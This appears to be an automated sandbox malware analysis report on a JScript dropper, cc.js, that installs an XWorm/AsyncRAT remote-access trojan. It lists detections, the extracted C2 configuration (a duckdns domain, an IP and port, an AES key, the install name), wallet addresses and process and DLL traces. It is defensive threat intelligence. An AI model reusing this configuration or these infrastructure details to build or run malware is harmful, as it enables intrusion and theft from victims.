Windows Analysis Report
cc.js

Overview

General Information

Sample name: cc.js
Analysis ID: 1523189
MD5: c63888086e1646654a1e162fde69c0ff
SHA1: 8580dafbffe4d9b0d7e122127a455682ad2bd30e
SHA256: 262fb2e45f9b66956236f89f4cbeac22ee3d011832263a28ed7f632a22ae87d7
Tags: 192-210-215-11jsuser-JAMESWT_MHT

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected XWorm
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Contains functionality to disable the Task Manager (.Net Source)
Creates multiple autostart registry keys
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: WScript or CScript Dropper
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Yara signature match

Classification

AV Detection

Source: cc.js Avira: detected
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Roaming\Service.exe Avira: detection malicious, Label: TR/Dropper.Gen
Source: 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Xworm {"C2 url": ["as525795.duckdns.org", "194.37.97.150"], "Port": "6980", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "adobe.exe", "Version": "XWorm V5.3"}
Source: cc.js ReversingLabs: Detection: 39%
Source: cc.js Virustotal: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Service.exe Joe Sandbox ML: detected
Source: 5.2.GeUT.exe.400000.0.unpack String decryptor: as525795.duckdns.org,194.37.97.150
Source: 5.2.GeUT.exe.400000.0.unpack String decryptor: 6980
Source: 5.2.GeUT.exe.400000.0.unpack String decryptor: <123456789>
Source: 5.2.GeUT.exe.400000.0.unpack String decryptor: <Xwormmm>
Source: 5.2.GeUT.exe.400000.0.unpack String decryptor: XWorm V5.3
Source: 5.2.GeUT.exe.400000.0.unpack String decryptor: adobe.exe
Source: 5.2.GeUT.exe.400000.0.unpack String decryptor: bc1q6ctx30m7yf3swhuskp3n34awjtnxw7974qewyh
Source: 5.2.GeUT.exe.400000.0.unpack String decryptor: 0x344Bc250C2901d36f2FD4698632D289B9977BEd6
Source: 5.2.GeUT.exe.400000.0.unpack String decryptor: BLMpkfcDYXR1q2bgbj2mBPk9uQsgAVc6vdv62zRuMAHN
Source: Binary string: \Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdb source: Service.exe
Source: Binary string: \Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdbT3n3 `3_CorDllMainmscoree.dll source: Service.exe
Source: Binary string: ktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdb source: GeUT.exe
Source: Binary string: C:\Users\IzzyMichiel\Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdbT3n3 `3_CorDllMainmscoree.dll source: GeUT.exe, Service.exe
Source: Binary string: C:\Users\IzzyMichiel\Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdb source: GeUT.exe, Service.exe
Source: Binary string: ktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdbT3n3 `3_CorDllMainmscoree.dll source: GeUT.exe

Networking

Source: Malware configuration extractor URLs: as525795.duckdns.org
Source: Malware configuration extractor URLs: 194.37.97.150
Source: unknown DNS query: name: as525795.duckdns.org
Source: unknown DNS traffic detected: query: as525795.duckdns.org reply code: Server failure (2)
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: as525795.duckdns.org
Source: GeUT.exe, 00000008.00000002.2286549047.0000000000914000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://go.mic
Source: GeUT.exe, 00000003.00000002.3410104953.00000000025D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Window created: window name: CLIPBRDWNDCLASS

System Summary

Source: 5.2.GeUT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.GeUT.exe.28363bc.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.GeUT.exe.2838018.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.2.GeUT.exe.2834784.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.GeUT.exe.3376aa4.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.GeUT.exe.3374e60.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.Service.exe.28d801c.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.GeUT.exe.3378700.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.Service.exe.28d4788.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.Service.exe.28d63c0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000005.00000002.2282391567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Windows\System32\wscript.exe COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\GeUT.exe 680ED672969AC8F7D533B74B27B152F4608EF9BBA02F48935829455190B1E996
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\Service.exe 680ED672969AC8F7D533B74B27B152F4608EF9BBA02F48935829455190B1E996
Source: cc.js Initial sample: Strings found which are bigger than 50
Source: 5.2.GeUT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.GeUT.exe.28363bc.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.GeUT.exe.2838018.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.2.GeUT.exe.2834784.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.GeUT.exe.3376aa4.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.GeUT.exe.3374e60.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.Service.exe.28d801c.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.GeUT.exe.3378700.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.Service.exe.28d4788.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.Service.exe.28d63c0.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000005.00000002.2282391567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: GeUT.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Service.exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: GeUT.exe.0.dr, Program.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.wscript.exe.26357946390.0.raw.unpack, Program.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.wscript.exe.263586370e0.0.raw.unpack, Program.cs Cryptographic APIs: 'CreateDecryptor'
Source: Service.exe.2.dr, Program.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.troj.evad.winJS@49/5@3/0
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe File created: C:\Users\user\AppData\Roaming\Service.exe
Source: C:\Users\user\AppData\Roaming\Service.exe Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Mutant created: \Sessions\1\BaseNamedObjects\wtYmVE2WY2XGhWlO
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\GeUT.exe
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cc.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msdart.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
